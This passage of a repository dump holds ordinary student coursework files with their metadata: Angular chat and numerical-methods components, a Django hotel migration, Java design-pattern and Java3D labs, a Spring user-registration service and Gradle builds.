SupportMessage[] = [];\n\n constructor() {\n this.wsCtx.setState(new BufferSendableState());\n\n const messageFactory = new JsonMessageFactory();\n\n this.ws = new WebSocket(this.wsUrl);\n this.ws.onopen = ev=>this.wsCtx.setState(new WebSocketSendableState(this.ws));\n\n this.wsObservable = Observable.create(observer=>{\n this.ws.onmessage = ev=>{console.log(ev.data);observer.next(ev.data);};\n }).map(msg=> (messageFactory.create(msg) as NewAnswerNotification).message);\n\n this.wsObservable.subscribe(msg=>this.messages.push(msg))\n }\n\n writeQuestion(msg: string){\n const consultationMessage = new SupportMessage(msg, false);\n this.messages.push(consultationMessage);\n this.wsCtx.write(msg);\n }\n}\n" }, { "alpha_fraction": 0.48086124658584595, "alphanum_fraction": 0.4820574223995209, "avg_line_length": 29.962963104248047, "blob_id": "4342c14bd0cf8196b2249123742cd59c5aeda7c1", "content_id": "b6933b6ee562f01d40f451ea28d0c705f5eb4f18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 836, "license_type": "no_license", "max_line_length": 78, "num_lines": 27, "path": "/db/lab1/sport.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "from lab1.data import Table, Attribute, autoinc\n\nclass SportDB:\n def __init__(self):\n self.team = Table(\n Attribute(\"name\", unique=True),\n Attribute(\"origin\"),\n Attribute(\"sport\")\n )\n\n self.player = Table(\n Attribute(\"id\", unique=True, default=autoinc()),\n Attribute(\"team_name\", reference=self.team.reference(\"name\")),\n Attribute(\"name\"),\n Attribute(\"score\")\n )\n\n def best(self):\n rs = []\n for team in self.team.find():\n players = self.player.find(team_name=team['name'])\n if not players:\n rs.append((team, None))\n else:\n rs.append((team,max(players, key=lambda p: int(p['score']))))\n\n return rs\n" }, { "alpha_fraction": 0.5281501412391663, "alphanum_fraction": 0.5465338826179504, "avg_line_length": 39.796875, "blob_id": "65344a44932bf8f8736ca8000c2a3ee9f90baa6d", "content_id": "26df76bb8d93d13c91fb8f26471a8052bb267e4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2611, "license_type": "no_license", "max_line_length": 156, "num_lines": 64, "path": "/hotels/tourism/hotels/migrations/0001_initial.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0 on 2017-12-21 00:40\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=100)),\n ('sent_at', models.DateTimeField()),\n ('message', models.CharField(max_length=1000)),\n ('rating', models.IntegerField(blank=True, choices=[(1, 'Very bad'), (2, 'Bad'), (3, 'Mediocre'), (4, 'Good'), (5, 'Awesome')], null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Country',\n fields=[\n ('name', models.CharField(max_length=150, primary_key=True, serialize=False)),\n ('description', models.CharField(max_length=2000)),\n ],\n ),\n migrations.CreateModel(\n name='Feature',\n fields=[\n ('name', models.CharField(max_length=50, primary_key=True, serialize=False)),\n ],\n ),\n migrations.CreateModel(\n name='Hotel',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, 
verbose_name='ID')),\n ('name', models.CharField(max_length=200)),\n ('brief_description', models.CharField(max_length=200)),\n ('description', models.CharField(max_length=2000)),\n ('country', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='hotels.Country')),\n ('features', models.ManyToManyField(blank=True, to='hotels.Feature')),\n ],\n ),\n migrations.CreateModel(\n name='Room',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('frees_at', models.DateTimeField(blank=True, null=True)),\n ('description', models.CharField(max_length=100)),\n ('daily_ratio', models.FloatField()),\n ('hotel', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='hotels.Hotel')),\n ],\n ),\n migrations.AddField(\n model_name='comment',\n name='hotel',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='hotels.Hotel'),\n ),\n ]\n" }, { "alpha_fraction": 0.6065858006477356, "alphanum_fraction": 0.6169844269752502, "avg_line_length": 30.97142791748047, "blob_id": "6c7063ce284c1799453acc3d091733636097e8af", "content_id": "92f61541c3451cef75671c52f99dbce788a9888a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1154, "license_type": "no_license", "max_line_length": 88, "num_lines": 35, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab2/task2/Application.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab2.task2;\r\n\r\nimport java.time.LocalDate;\r\n\r\npublic class Application {\r\n private static void lineSeparation() {\r\n for (int i = 0; i < 15; i++) System.out.print(' ');\r\n System.out.println();\r\n }\r\n\r\n public static void main(String... 
args) {\r\n Terminal terminal = new Terminal();\r\n SubwayClient john = new SubwayClient(\"John\");\r\n\r\n terminal.pass(john, john.tokenPayment());\r\n lineSeparation();\r\n\r\n john.buyTokens(1);\r\n terminal.pass(john, john.tokenPayment());\r\n terminal.pass(john, john.tokenPayment());\r\n lineSeparation();\r\n\r\n john.buyMonthSubscription(LocalDate.now());\r\n terminal.pass(john, john.monthSubscriptionPayment());\r\n terminal.pass(john, john.tokenPayment());\r\n lineSeparation();\r\n\r\n john.buyPassesSubscription(3);\r\n for (int i = 0; i < 4; i++) terminal.pass(john, john.passSubscriptionPayment());\r\n lineSeparation();\r\n\r\n john.buyMonthSubscription(LocalDate.now().minusMonths(1).minusDays(1));\r\n terminal.pass(john, john.monthSubscriptionPayment());\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5155313611030579, "alphanum_fraction": 0.5171661972999573, "avg_line_length": 20.9375, "blob_id": "09560c3b8ea28734948fbe8c1698d11bea0cae2b", "content_id": "c2a0bb6ee8f7df216b41a9ea3d29565ecf6aa8d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1835, "license_type": "no_license", "max_line_length": 66, "num_lines": 80, "path": "/otp/src/main/java/io/github/k_gregory/otp/lab2/datatypes/NumVal.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab2.datatypes;\r\n\r\nimport io.github.k_gregory.otp.lab2.MathValVisitor;\r\n\r\npublic class NumVal extends MathVal {\r\n final Double val;\r\n\r\n public NumVal(Double val) {\r\n this.val = val;\r\n }\r\n\r\n @Override\r\n public MathVal accept(MathValVisitor v) {\r\n return v.visit(this);\r\n }\r\n\r\n @Override\r\n public MathVal plus(MathVal right) {\r\n final MathVal that = this;\r\n return right.accept(new MathValVisitor() {\r\n @Override\r\n public MathVal visit(NumVal num) {\r\n return new NumVal(num.val + val);\r\n }\r\n\r\n @Override\r\n public MathVal visit(VectorVal vector) {\r\n return vector.plus(that);\r\n }\r\n });\r\n }\r\n\r\n\r\n @Override\r\n public MathVal inverse() {\r\n return new NumVal(1.d / val);\r\n }\r\n\r\n @Override\r\n public MathVal absolute() {\r\n return new NumVal(Math.abs(val));\r\n }\r\n\r\n @Override\r\n public MathVal mul(MathVal other) {\r\n MathVal that = this;\r\n return other.accept(new MathValVisitor() {\r\n @Override\r\n public MathVal visit(NumVal num) {\r\n return new NumVal(num.val * val);\r\n }\r\n\r\n @Override\r\n public MathVal visit(VectorVal vector) {\r\n return vector.mul(that);\r\n }\r\n });\r\n }\r\n\r\n @Override\r\n public String toString() {\r\n return val.toString();\r\n }\r\n\r\n @Override\r\n public boolean equals(Object o) {\r\n if (this == o) return true;\r\n if (o == null || getClass() != o.getClass()) return false;\r\n\r\n NumVal numVal = (NumVal) o;\r\n\r\n return val.equals(numVal.val);\r\n }\r\n\r\n\r\n @Override\r\n public int hashCode() {\r\n return val.hashCode();\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6012861728668213, "alphanum_fraction": 0.6012861728668213, "avg_line_length": 33.55555725097656, "blob_id": "41acf87d0acfd7dff6c39193759687652bad9765", "content_id": "152293e65b0db9e81f6d85c7f288cbbc29c111b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 933, "license_type": "no_license", "max_line_length": 147, "num_lines": 27, "path": "/insurance/frontend/src/app/supporter-consultation/supporter-consultation.component.html", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "<div 
id=\"consultPod\">\n <table>\n <tr *ngFor=\"let client of clients\" ngClass=\"{{client.id == consultation.selectedClient ? 'goodrow':''}}\">\n <td>\n ID: \"{{client.id}}\"\n </td>\n <td>\n <button (click)=\"selectClient(client.id)\">View chat</button>\n </td>\n <td>\n <button (click)=\"assignClient(client.id)\" *ngIf=\"!client.assigned\">Assign to me</button>\n <button (click)=\"unassignClient(client.id)\" *ngIf=\"client.assignedToMe\">Unassign from me</button>\n </td>\n <td [ngClass]=\"{'msgnotify': client.hasNewMessages && client.assignedToMe}\">{{client.hasNewMessages ? \"New message!\":\"No new messages\"}}</td>\n </tr>\n </table>\n\n <div *ngIf=\"consultation.selectedClient\">\n <label>\n Write answer:\n <input [(ngModel)]=\"message\">\n </label>\n <button (click)=\"answer()\">Post answer!</button>\n </div>\n\n <app-messages [list]=\"currentMessages\"></app-messages>\n</div>\n" }, { "alpha_fraction": 0.5734671950340271, "alphanum_fraction": 0.6067239046096802, "avg_line_length": 30.93050193786621, "blob_id": "f74f15e4cb04c12926ff78db94a8e0bfa3835ea1", "content_id": "a351b07190669d79d37e8552ad8ad6e76282fef5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 8393, "license_type": "no_license", "max_line_length": 101, "num_lines": 259, "path": "/cg/cg-lab6/src/main/java/cglabs/lab6/BouncingBall.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package cglabs.lab6;\n\nimport com.sun.j3d.loaders.Scene;\nimport com.sun.j3d.loaders.objectfile.ObjectFile;\nimport com.sun.j3d.utils.applet.MainFrame;\nimport com.sun.j3d.utils.behaviors.keyboard.KeyNavigatorBehavior;\nimport com.sun.j3d.utils.geometry.Primitive;\nimport com.sun.j3d.utils.image.TextureLoader;\nimport com.sun.j3d.utils.universe.PlatformGeometry;\nimport com.sun.j3d.utils.universe.SimpleUniverse;\n\nimport javax.media.j3d.*;\nimport javax.vecmath.*;\nimport java.applet.Applet;\nimport java.awt.*;\nimport java.awt.event.KeyEvent;\nimport java.awt.event.KeyListener;\nimport java.io.File;\nimport java.util.Hashtable;\n\npublic class BouncingBall extends Applet implements KeyListener {\n\n static TextureLoader loader = new TextureLoader(\"model/texture.jpg\",\n \"RGP\", new Container());\n static Texture texture = loader.getTexture();\n\n private SimpleUniverse universe = null;\n private Canvas3D canvas = null;\n private TransformGroup viewtrans = null;\n\n private TransformGroup tg = null;\n private Transform3D t3d = null;\n private Transform3D t3dstep = new Transform3D();\n private Matrix4d matrix = new Matrix4d();\n\n private Shape3D[] legs = new Shape3D[6];\n\n public BouncingBall() {\n setLayout(new BorderLayout());\n GraphicsConfiguration config = SimpleUniverse\n .getPreferredConfiguration();\n\n canvas = new Canvas3D(config);\n add(\"Center\", canvas);\n universe = new SimpleUniverse(canvas);\n\n BranchGroup scene = createSceneGraph();\n universe.getViewingPlatform().setNominalViewingTransform();\n\n universe.getViewer().getView().setBackClipDistance(100.0);\n\n canvas.addKeyListener(this);\n\n universe.addBranchGraph(scene);\n }\n\n public static void main(String[] args) {\n BouncingBall applet = new BouncingBall();\n Frame frame = new MainFrame(applet, 800, 600);\n }\n\n private BranchGroup createSceneGraph() {\n BranchGroup objRoot = new BranchGroup();\n\n BoundingSphere bounds = new BoundingSphere(new Point3d(), 10000.0);\n\n viewtrans = universe.getViewingPlatform().getViewPlatformTransform();\n\n KeyNavigatorBehavior keyNavBeh = new 
KeyNavigatorBehavior(viewtrans);\n        keyNavBeh.setSchedulingBounds(bounds);\n        PlatformGeometry platformGeom = new PlatformGeometry();\n        platformGeom.addChild(keyNavBeh);\n        universe.getViewingPlatform().setPlatformGeometry(platformGeom);\n\n        objRoot.addChild(createLadybird());\n\n        Background background = new Background();\n        background.setColor(0.75f, 0.69f, 0.680f);\n        background.setApplicationBounds(bounds);\n        objRoot.addChild(background);\n\n        return objRoot;\n    }\n\n    private BranchGroup createLadybird() {\n\n        BranchGroup objRoot = new BranchGroup();\n        tg = new TransformGroup();\n        t3d = new Transform3D();\n\n        tg.setCapability(TransformGroup.ALLOW_TRANSFORM_WRITE);\n\n        t3d.setTranslation(new Vector3d(-0.15, -0.3, -5.0));\n        t3d.setRotation(new AxisAngle4f(0.0f, 0.0f, 0.0f, 0.0f));\n        t3d.setScale(1.0);\n\n        tg.setTransform(t3d);\n\n        texture.setBoundaryModeS(Texture.WRAP);\n        texture.setBoundaryModeT(Texture.WRAP);\n        texture.setBoundaryColor(new Color4f(0.0f, 1.0f, 0.0f, 0.0f));\n        TextureAttributes texAttr = new TextureAttributes();\n        texAttr.setTextureMode(TextureAttributes.MODULATE);\n        Appearance ap = new Appearance();\n        ap.setTexture(texture);\n        ap.setTextureAttributes(texAttr);\n        int primflags = Primitive.GENERATE_NORMALS\n                + Primitive.GENERATE_TEXTURE_COORDS;\n        ObjectFile loader = new ObjectFile(ObjectFile.RESIZE);\n\n\n        Scene s = null;\n\n        File file = new java.io.File(\"model/ladybug.obj\");\n\n        try {\n            s = loader.load(file.toURI().toURL());\n        } catch (Exception e) {\n            System.err.println(e);\n            System.exit(1);\n        }\n\n        Hashtable namedObjects = s.getNamedObjects();\n        for (int i = 1; i <= 6; i++) {\n            legs[i - 1] = (Shape3D) namedObjects.get(\"leg\" + i);\n        }\n        Shape3D ladybug = (Shape3D) namedObjects.get(\"ladybug\");\n        ladybug.setAppearance(ap);\n\n        /*ROTATE LEGS*/\n        Transform3D hourArrowRotationAxis = new Transform3D();\n        hourArrowRotationAxis.rotZ(Math.PI / 2);\n\n        for (int i = 0; i < 6; i++) {\n            TransformGroup tgmHourArrow = new TransformGroup();\n            Shape3D hour_arrow = legs[i];\n            tgmHourArrow.addChild(hour_arrow.cloneTree());\n            legs[i].removeAllGeometries();\n\n            int timeStart = 0; // delay (ms) before the leg rotation starts\n            int noRotationsHour = 2000; // number of rotations\n            int timeRotationHour = 1000; // duration of one rotation (ms)\n            // Alpha for the hour-hand movement\n            Alpha hourRotationAlpha = new Alpha(noRotationsHour,\n                    Alpha.INCREASING_ENABLE,\n                    timeStart,\n                    0, timeRotationHour, 0, 0, 0, 0, 0);\n            // rotation of the hour hand\n            RotationInterpolator hourArrRotation = new RotationInterpolator(\n                    hourRotationAlpha, tgmHourArrow,\n                    hourArrowRotationAxis, (float) Math.PI * 2, 0.0f);\n            BoundingSphere bounds = new BoundingSphere(new Point3d(0.0, 0.0, 0.0), Double.MAX_VALUE);\n            hourArrRotation.setSchedulingBounds(bounds);\n            tgmHourArrow.setCapability(TransformGroup.ALLOW_TRANSFORM_WRITE);\n            tgmHourArrow.addChild(hourArrRotation);\n\n            tg.addChild(tgmHourArrow);\n        }\n        /*Rotate legs end*/\n\n        tg.addChild(s.getSceneGroup());\n\n        objRoot.addChild(tg);\n        objRoot.addChild(createLight());\n\n        objRoot.compile();\n\n        return objRoot;\n\n    }\n\n    private Light createLight() {\n        DirectionalLight light = new DirectionalLight(true, new Color3f(1.0f,\n                1.0f, 1.0f), new Vector3f(-0.3f, 0.2f, -1.0f));\n\n        light.setInfluencingBounds(new BoundingSphere(new Point3d(), 10000.0));\n\n        return light;\n    }\n\n    public void keyTyped(KeyEvent e) {\n        char key = e.getKeyChar();\n\n        if (key == 'd') {\n            t3dstep.set(new Vector3d(0.0, 0.0, 0.1));\n            tg.getTransform(t3d);\n            t3d.mul(t3dstep);\n            tg.setTransform(t3d);\n        }\n\n        if (key == 
's') {\n\n t3dstep.rotY(Math.PI / 32);\n tg.getTransform(t3d);\n t3d.get(matrix);\n t3d.setTranslation(new Vector3d(0.0, 0.0, 0.0));\n t3d.mul(t3dstep);\n t3d.setTranslation(new Vector3d(matrix.m03, matrix.m13, matrix.m23));\n tg.setTransform(t3d);\n\n }\n\n if (key == 'f') {\n\n t3dstep.rotY(-Math.PI / 32);\n tg.getTransform(t3d);\n t3d.get(matrix);\n t3d.setTranslation(new Vector3d(0.0, 0.0, 0.0));\n t3d.mul(t3dstep);\n t3d.setTranslation(new Vector3d(matrix.m03, matrix.m13, matrix.m23));\n tg.setTransform(t3d);\n\n }\n\n if (key == 'r') {\n\n t3dstep.rotX(Math.PI / 32);\n tg.getTransform(t3d);\n t3d.get(matrix);\n t3d.setTranslation(new Vector3d(0.0, 0.0, 0.0));\n t3d.mul(t3dstep);\n t3d.setTranslation(new Vector3d(matrix.m03, matrix.m13, matrix.m23));\n tg.setTransform(t3d);\n\n }\n\n if (key == 'v') {\n\n t3dstep.rotX(-Math.PI / 32);\n tg.getTransform(t3d);\n t3d.get(matrix);\n t3d.setTranslation(new Vector3d(0.0, 0.0, 0.0));\n t3d.mul(t3dstep);\n t3d.setTranslation(new Vector3d(matrix.m03, matrix.m13, matrix.m23));\n tg.setTransform(t3d);\n\n }\n\n if (key == 'e') {\n t3dstep.set(new Vector3d(0.0, 0.1, 0.0));\n tg.getTransform(t3d);\n t3d.mul(t3dstep);\n tg.setTransform(t3d);\n }\n\n if (key == 'c') {\n t3dstep.set(new Vector3d(0.0, -0.1, 0.0));\n tg.getTransform(t3d);\n t3d.mul(t3dstep);\n tg.setTransform(t3d);\n }\n }\n\n public void keyReleased(KeyEvent e) {\n }\n\n public void keyPressed(KeyEvent e) {\n }\n}" }, { "alpha_fraction": 0.5859649181365967, "alphanum_fraction": 0.6175438761711121, "avg_line_length": 15.764705657958984, "blob_id": "7aebf84bae386996359a9ae10d28ccdbdcb6e18c", "content_id": "b5c24b5543e9fedf2b5e7e50820ded7344f23fa7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 285, "license_type": "no_license", "max_line_length": 41, "num_lines": 17, "path": "/numerical-methods/src/app/f.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "export function f(x: number): number {\n const sqrt = Math.sqrt(1 - x);\n return Math.sinh(sqrt) / sqrt;\n}\n\nexport const l = -13.0;\nexport const h = -5.0;\n\n\n/*\nexport function f(x:number):number {\n return x * Math.cos(x/3) - Math.log(x);\n}\n\nexport const l = 1;\nexport const h = 5;\n*/\n" }, { "alpha_fraction": 0.6306483149528503, "alphanum_fraction": 0.6404715180397034, "avg_line_length": 20.20833396911621, "blob_id": "47c4464517065b96204056f304fbdda3619a7a99", "content_id": "0963cbc551f95311badda3bf2afdf67dcddfd831", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 509, "license_type": "no_license", "max_line_length": 51, "num_lines": 24, "path": "/numerical-methods/src/app/trapezoid/trapezoid.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { Component, OnInit } from '@angular/core';\nimport {trapetion_simple} from \"../trapetion\";\nimport {f, l, h} from \"../f\";\n\n@Component({\n selector: 'app-trapezoid',\n templateUrl: './trapezoid.component.html',\n styleUrls: ['./trapezoid.component.css']\n})\nexport class TrapezoidComponent implements OnInit {\n h: string = \"0.0001\";\n result?: number = null;\n\n constructor() { }\n\n calc(){\n let dist = parseFloat(this.h);\n this.result = trapetion_simple(f, l, h, dist);\n }\n\n ngOnInit() {\n }\n\n}\n" }, { "alpha_fraction": 0.5877721309661865, "alphanum_fraction": 0.5956461429595947, "avg_line_length": 25.329267501831055, "blob_id": "9a8b208128f146e0449331164dc749e8c7c59988", "content_id": 
"fd8b72ee5d2bcfb67b7becc717e643926e4cbdcd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2159, "license_type": "no_license", "max_line_length": 87, "num_lines": 82, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab5/task1/Application.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab5.task1;\n\ninterface FillingHandler {\n boolean fill(String what);\n\n void setNext(FillingHandler next);\n}\n\nclass Cistern implements FillingHandler {\n private final String name;\n private int capacity;\n private FillingHandler next;\n\n Cistern(int capacity, String name) {\n if (capacity < 0) throw new IllegalArgumentException(\"capacity\");\n this.capacity = capacity;\n this.name = name;\n }\n\n @Override\n public boolean fill(String what) {\n if (capacity == 0) {\n System.out.println(name + \" is empty\");\n return next.fill(what);\n } else {\n System.out.println(name + \" fills \" + what);\n capacity--;\n return true;\n }\n }\n\n @Override\n public void setNext(FillingHandler next) {\n this.next = next;\n }\n}\n\nclass FillErrorMessage implements FillingHandler {\n @Override\n public boolean fill(String what) {\n System.out.println(\"Failed to fill \" + what);\n return false;\n }\n\n @Override\n public void setNext(FillingHandler next) {\n }\n}\n\nclass CoffeMachine {\n private FillingHandler fillingHandler;\n\n public CoffeMachine() {\n FillingHandler[] handlers = new FillingHandler[4];\n for (int i = 0; i < 3; i++)\n handlers[i] = new Cistern(2, \"Water cistern #\" + (i + 1));\n\n handlers[3] = new FillErrorMessage();\n\n for (int i = 0; i < 3; i++)\n handlers[i].setNext(handlers[i + 1]);\n\n fillingHandler = handlers[0];\n }\n\n public void makeCoffe() {\n System.out.println(\"Starting making coffe. Putting coffe and dust in the can\");\n boolean filled = fillingHandler.fill(\"the can\");\n if (filled) System.out.println(\"Coffe ready, enjoy the dust. Next!\");\n else System.out.println(\"Unlucky, no coffe for you. Go away\");\n }\n}\n\npublic class Application {\n public static void main(String... 
args) {\n CoffeMachine coffeMachine = new CoffeMachine();\n for (int i = 0; i < 7; i++) {\n coffeMachine.makeCoffe();\n System.out.println();\n }\n }\n}\n" }, { "alpha_fraction": 0.7544195055961609, "alphanum_fraction": 0.7544195055961609, "avg_line_length": 37.05454635620117, "blob_id": "b337749d3dba160dfe08fff11bece50d299a0a2f", "content_id": "a5494b6af4dd92626b2d70d502f4821e7994c6b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2093, "license_type": "no_license", "max_line_length": 123, "num_lines": 55, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/security/impl/UserServiceImpl.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.security.impl;\n\nimport io.github.k_gregory.insurance.entity.Role;\nimport io.github.k_gregory.insurance.entity.User;\nimport io.github.k_gregory.insurance.exception.UserExistsException;\nimport io.github.k_gregory.insurance.service.security.UserService;\nimport io.github.k_gregory.insurance.service.repository.RoleRepository;\nimport io.github.k_gregory.insurance.service.repository.UserRepository;\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.security.crypto.password.PasswordEncoder;\nimport org.springframework.stereotype.Service;\nimport org.springframework.transaction.annotation.Isolation;\nimport org.springframework.transaction.annotation.Transactional;\n\nimport java.util.Collection;\nimport java.util.HashSet;\nimport java.util.List;\n\n\n@Service\npublic class UserServiceImpl implements UserService {\n private final UserRepository userRepository;\n private final RoleRepository roleRepository;\n private final PasswordEncoder passwordEncoder;\n\n @Autowired\n public UserServiceImpl(UserRepository userRepository, RoleRepository roleRepository, PasswordEncoder passwordEncoder) {\n this.userRepository = userRepository;\n this.roleRepository = roleRepository;\n this.passwordEncoder = passwordEncoder;\n }\n\n @Override\n @Transactional(\n isolation = Isolation.SERIALIZABLE\n )\n public User register(String login, String password, Collection<String> roleNames) {\n User existentUser = userRepository.findOne(login);\n if (existentUser != null) {\n throw new UserExistsException(login);\n }\n\n User user = new User();\n String passwordHash = passwordEncoder.encode(password);\n List<Role> roles = roleRepository.findAll(roleNames);\n if (roles.size() != roleNames.size())\n throw new IllegalArgumentException(\"roleNames\");\n\n user.setLogin(login);\n user.setPasswordHash(passwordHash);\n user.setRoles(new HashSet<>(roles));\n\n return userRepository.save(user);\n }\n}\n" }, { "alpha_fraction": 0.6807772517204285, "alphanum_fraction": 0.6828591227531433, "avg_line_length": 26.711538314819336, "blob_id": "0bbf8f1a89c1f5f2338a0610552dca57b55db5a2", "content_id": "2f98adcd4d069030844fc8a4a66e7fd7fecb22de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1469, "license_type": "no_license", "max_line_length": 98, "num_lines": 52, "path": "/numerical-methods/src/app/app.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {ChangeDetectorRef, Component, OnDestroy, OnInit} from '@angular/core';\nimport {MediaMatcher} from \"@angular/cdk/layout\";\n\nimport {routes} from \"./routes\";\nimport {ActivatedRoute, Router, RoutesRecognized} from \"@angular/router\";\n\n@Component({\n 
selector: 'app-root',\n templateUrl: './app.component.html',\n styleUrls: ['./app.component.css']\n})\nexport class AppComponent implements OnDestroy, OnInit {\n private currentMethodName? : string;\n opened = true;\n routes : {name: string, path: string}[];\n\n mobileQuery: MediaQueryList;\n\n private _mobileQueryListener: () => void;\n\n constructor(changeDetectorRef: ChangeDetectorRef, media: MediaMatcher, private router: Router) {\n this.mobileQuery = media.matchMedia('(max-width: 600px)');\n this._mobileQueryListener = () => changeDetectorRef.detectChanges();\n this.mobileQuery.addListener(this._mobileQueryListener);\n\n\n this.routes = routes.map(r=>({\n name: <string>r.data.name,\n path: r.path\n }))\n }\n\n ngOnDestroy(): void {\n this.mobileQuery.removeListener(this._mobileQueryListener);\n }\n\n get title(): string {\n if(this.currentMethodName){\n return \"Чисельні методи: \" + this.currentMethodName;\n } else {\n return \"Чисельні методи\";\n }\n }\n\n ngOnInit(): void {\n this.router.events.subscribe((d)=>{\n if(d instanceof RoutesRecognized){\n this.currentMethodName = d.state.root.firstChild.data.name;\n }\n })\n }\n}\n" }, { "alpha_fraction": 0.6546071171760559, "alphanum_fraction": 0.6890898942947388, "avg_line_length": 36.63829803466797, "blob_id": "0ba071a6c87eafae92288250269841d29d4edbcd", "content_id": "139c9fb26278de1c9ed21208a02ce22a0500a150", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 1769, "license_type": "no_license", "max_line_length": 110, "num_lines": 47, "path": "/insurance/backend/build.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "group 'io.github.k-gregory'\nversion '1.0-SNAPSHOT'\n\nbuildscript {\n repositories {\n jcenter()\n }\n\n dependencies {\n classpath 'com.github.ben-manes:gradle-versions-plugin:0.15.0'\n classpath(\"org.springframework.boot:spring-boot-gradle-plugin:1.5.2.RELEASE\")\n }\n}\n\nrepositories {\n mavenCentral()\n}\n\napply plugin: 'java'\napply plugin: 'org.springframework.boot'\napply plugin: 'com.github.ben-manes.versions'\n\n\nsourceCompatibility = 1.8\n\n\ndependencies {\n compile group: 'org.springframework.boot', name: 'spring-boot-devtools', version: '1.5.4.RELEASE'\n compile group: 'org.springframework.boot', name: 'spring-boot-starter-thymeleaf', version: '1.5.4.RELEASE'\n compile group: 'org.springframework', name: 'spring-websocket', version: '4.3.9.RELEASE'\n compile group: 'org.springframework.security', name: 'spring-security-config', version: '4.2.3.RELEASE'\n compile group: 'org.springframework.security', name: 'spring-security-web', version: '4.2.3.RELEASE'\n\n compile group: 'org.springframework.data', name: 'spring-data-jpa', version: '1.11.4.RELEASE'\n compile group: 'org.springframework', name: 'spring-orm', version: '4.3.9.RELEASE'\n compile group: 'com.zaxxer', name: 'HikariCP', version: '2.6.2'\n compile group: 'org.hibernate', name: 'hibernate-core', version: '5.2.10.Final'\n compile group: 'org.postgresql', name: 'postgresql', version: '42.1.1'\n compile \"org.flywaydb:flyway-core:4.2.0\"\n\n compile group: 'org.aspectj', name: 'aspectjweaver', version: '1.8.10'\n\n compile group: 'com.google.guava', name: 'guava', version: '22.0'\n compile group: 'com.fasterxml.jackson.core', name: 'jackson-databind', version: '2.8.8.1'\n\n testCompile group: 'junit', name: 'junit', version: '4.12'\n}\n" }, { "alpha_fraction": 0.7360405921936035, "alphanum_fraction": 0.7563451528549194, "avg_line_length": 15.416666984558105, "blob_id": 
"583cd4bb010fc704e504bdb14cbe13d1580f0626", "content_id": "fe279fa4607ee0a7fa6240741ce4fdc4b2114089", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 197, "license_type": "no_license", "max_line_length": 61, "num_lines": 12, "path": "/graphics/build.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "apply plugin: 'java'\napply plugin: 'application'\n\nmainClassName=\"io.github.k_gregory.graphics.lab1.Application\"\n\nrepositories{\n mavenCentral()\n}\n\ndependencies {\n compile \"org.ejml:ejml-all:0.34\"\n}\n" }, { "alpha_fraction": 0.7540279030799866, "alphanum_fraction": 0.7540279030799866, "avg_line_length": 21.987653732299805, "blob_id": "64db335307bd38a64e7b2eb0c15d186225c9edba", "content_id": "b3a312c57f843b605987899aa3e3abce0667018e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 3724, "license_type": "no_license", "max_line_length": 69, "num_lines": 162, "path": "/insurance/frontend/src/consultation/ConsultationMessage.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "export interface WsNotificationVisitor{\n visitNewQuestionNotification(c: NewQuestionNotification);\n visitNewClientNotification(c: NewClientNotification);\n visitNewAnswerNotification(c: NewAnswerNotification);\n visitClientDisconnectNotification(c: ClientDisconnectNotification);\n visitFreeClientListNotification(c: FreeClientListNotification);\n visitClientAssignedNotification(c: ClientAssignedNotification);\n visitMessageListNotification(c: MessageListNotification);\n}\n\nexport interface WsNotification{\n 